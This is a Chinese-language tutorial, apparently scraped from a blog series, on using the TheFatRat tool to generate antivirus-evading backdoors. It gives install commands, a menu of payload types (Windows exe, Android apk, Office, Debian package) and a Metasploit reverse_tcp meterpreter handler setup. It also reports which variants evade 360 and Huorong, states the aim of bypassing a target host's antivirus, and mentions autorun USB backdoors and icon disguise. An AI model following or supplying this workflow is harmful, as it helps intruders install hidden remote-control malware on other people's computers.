0x01 免殺能力一覽表

幾點說明：

1、上表中標(biāo)識 √ 說明相應(yīng)殺毒軟件未檢測出病毒，也就是代表了Bypass。

2、為了更好的對比效果，大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。

3、由于本機(jī)測試時只是安裝了360全家桶和火絨，所以默認(rèn)情況下360和火絨殺毒情況指的是靜態(tài)+動態(tài)查殺。360殺毒版本5.0.0.8160(2020.01.01)，火絨版本5.0.34.16(2020.01.01)，360安全衛(wèi)士12.0.0.2002(2020.01.01)。

4、其他殺軟的檢測指標(biāo)是在virustotal.com（簡稱VT）上在線查殺，所以可能只是代表了靜態(tài)查殺能力，數(shù)據(jù)僅供參考，不足以作為免殺的精確判斷指標(biāo)。

5、完全不必要苛求一種免殺技術(shù)能bypass所有殺軟，這樣的技術(shù)肯定是有的，只是沒被公開，一旦公開第二天就能被殺了，其實我們只要能bypass目標(biāo)主機(jī)上的殺軟就足夠了。

0x02 TheFatRat介紹

TheFatRat創(chuàng)建的后門或者payload，可以在Linux，Windows，Mac和Android上等多種平臺上執(zhí)行，可生成exe、apk、sh、bat、py等多種格式。TheFatRat可以和msf無縫對接，并且集成內(nèi)置了Fudwin、Avoid、backdoor-factory等多個免殺工具，對powershell的免殺姿勢尤其多樣。

0x03 安裝TheFatRat

推薦使用linux操作系統(tǒng)，如Kali、Parrot、Dracos、BackTrack、Backbox等

3.1Github安裝

安裝比較簡單，首先從github上clone下來

然后進(jìn)入TheFatRat目錄

cd TheFatRat

執(zhí)行安裝命令

chmod +x setup.sh && ./setup.sh

在成功安裝后，可以查看TheFatRat/logs目錄下的setup.log文件，里面是TheFatRat需要的一些軟件和環(huán)境。

3、2 軟件升級

作者提供了升級的命令，可直接升級軟件

./update && chmod + x setup.sh && ./setup.sh

0x04 TheFatRat使用說明

在安裝完成后，使用命令fatrat即可執(zhí)行，啟動略慢。TheFatRat和專題9里的Avet一樣，也默認(rèn)不允許遠(yuǎn)程連接后執(zhí)行，只能在linux主機(jī)內(nèi)執(zhí)行。

運(yùn)行時會檢測一些軟件或環(huán)境是否已經(jīng)安裝

同時還會有個界面提醒大家不要把生成的后門上傳到virustotal.com上面，可以上傳到nodistribute.com(專門試了下，但上傳樣本一直不成功)。

之后就能看到啟動后的界面了

常用創(chuàng)建后門菜單如下，我自己翻譯解釋了一下，有個別可能不太準(zhǔn)確。

[01] Create Backdoor with msfvenom #01：直接利用msf來生產(chǎn)后門，基本不能免殺[02] Create Fud 100% Backdoor with Fudwin 1.0 #02：使用Fudwin 1.0創(chuàng)建powershell后門，ps1利用powerstager混淆，從結(jié)果來看效果不錯[03] Create Fud Backdoor with Avoid v1.2 # 03: 使用Avoid v1.2創(chuàng)建后門[04] Create Fud Backdoor with backdoor-factory [embed] #04：使用backdoor-factory創(chuàng)建后門[05] Backdooring Original apk [Instagram, Line,etc] #05：生成安卓使用的apk后門[06] Create Fud Backdoor 1000% with PwnWinds [Excelent] #06：綜合了多種方式，可生成bat、exe、dll、ps1等，可利用c、C#多種語言編譯，官方非常推薦，但經(jīng)嘗試免殺效果一般，肯定是被殺軟列入特征庫了[07] Create Backdoor For Office with Microsploit #07：生成office類后門[08] Trojan Debian Package For Remote Access [Trodebi] #08：生成linux后門

由于01是直接調(diào)用了msfvenom生成payload，只不過稍微進(jìn)行了多個msfvenom編碼，免殺效果肯定一般。
[01] Create Backdoor with msfvenom生成過程如下：

我這里就直接使用官方推薦的2和6進(jìn)行測試了。

0x05 使用TheFatRat生成ps1-exe

在主菜單選擇2，進(jìn)入[02] Create Fud 100% Backdoor with Fudwin 1.0，選擇1，利用powerstager混淆，并將powershell編譯成exe。


在生成過程中可能會報錯，如下所示



這樣就生成成功了。

在我本地機(jī)器上監(jiān)聽5555端口

use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.211.55.2 set LPORT 3333 exploit -j

在測試機(jī)器上執(zhí)行payload.exe，生成的payload.exe圖中目錄下

打開殺軟進(jìn)行測試，雖然火絨靜態(tài)查殺沒查出來，不過行為檢測查殺到了。360靜態(tài)和動態(tài)都能查殺。（病毒庫均已更新到2020.01.01）

0x06 使用TheFatRat生成加殼exe

在主菜單選擇2，進(jìn)入[02] Create Fud 100% Backdoor with Fudwin 1.0，選擇2，slow but powerfull（慢但是有效）

輸入監(jiān)聽ip和端口后，可能會報錯，也可能解密界面都消失，但其實后臺還在運(yùn)行.

看免殺過程，應(yīng)該是msfvenom一定編碼后進(jìn)行upx加殼,可能還有其他處理，想了解詳細(xì)過程的可以看下源碼。

等一段時間后，在/root/Fatrat_Generated/目錄下會發(fā)現(xiàn)生成了Powerfull.exe和Powerfull-fud.exe。

在測試機(jī)器運(yùn)行，火絨靜態(tài)動態(tài)都可查殺，可正常上線

360動態(tài)和靜態(tài)都沒有反應(yīng)

0x07 使用TheFatRat編譯C#+powershell生成exe

嘗試官方比較推薦的第6種方式[06] Create Fud Backdoor 1000% with PwnWinds [Excelent],進(jìn)入后菜單如下，我選擇2使用c#+powershell來生成exe

配置好ip、端口和文件名，選擇好監(jiān)聽payload

生成成功

可正常上線

打開殺軟，靜態(tài)檢測沒問題，但行為檢測時360和火絨都報預(yù)警了。

0x08 小結(jié)

TheFatRat創(chuàng)建的后門格式和支持的平臺比較多樣化，而且還支持生成CDROM/U盤中能自動運(yùn)行(生成AutoRun文件)的后門文件，并且可以對payload更改圖標(biāo)，具有一定偽裝效果。

TheFatRat的很多免殺方式是借助于msfvenom編碼、upx等加殼壓縮、c/c#編譯等將powershell混淆后編譯成exe或bat文件，但有些在執(zhí)行時還是會調(diào)用powershell，而powershell的調(diào)用已經(jīng)被各大殺軟盯的很緊了，所以查殺效果只能算是一般了。

由于使用TheFatRat生成了多種payload，免殺效果各不相同，我就選了個折中一些的22/70作為TheFatRat的免殺代表。

0x09 參考資料

TheFatRat 一款簡易后門工具：https://www.zhuanzhi.ai/document/22f6e03336336de7f211ac7b97c2fb0f

TheFatRat – 跨平臺反彈后門Shell生成神器：http://caidaome.com/?post=198

總結(jié)

以上是生活随笔為你收集整理的远控免杀专题10--TheFatRat免杀的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。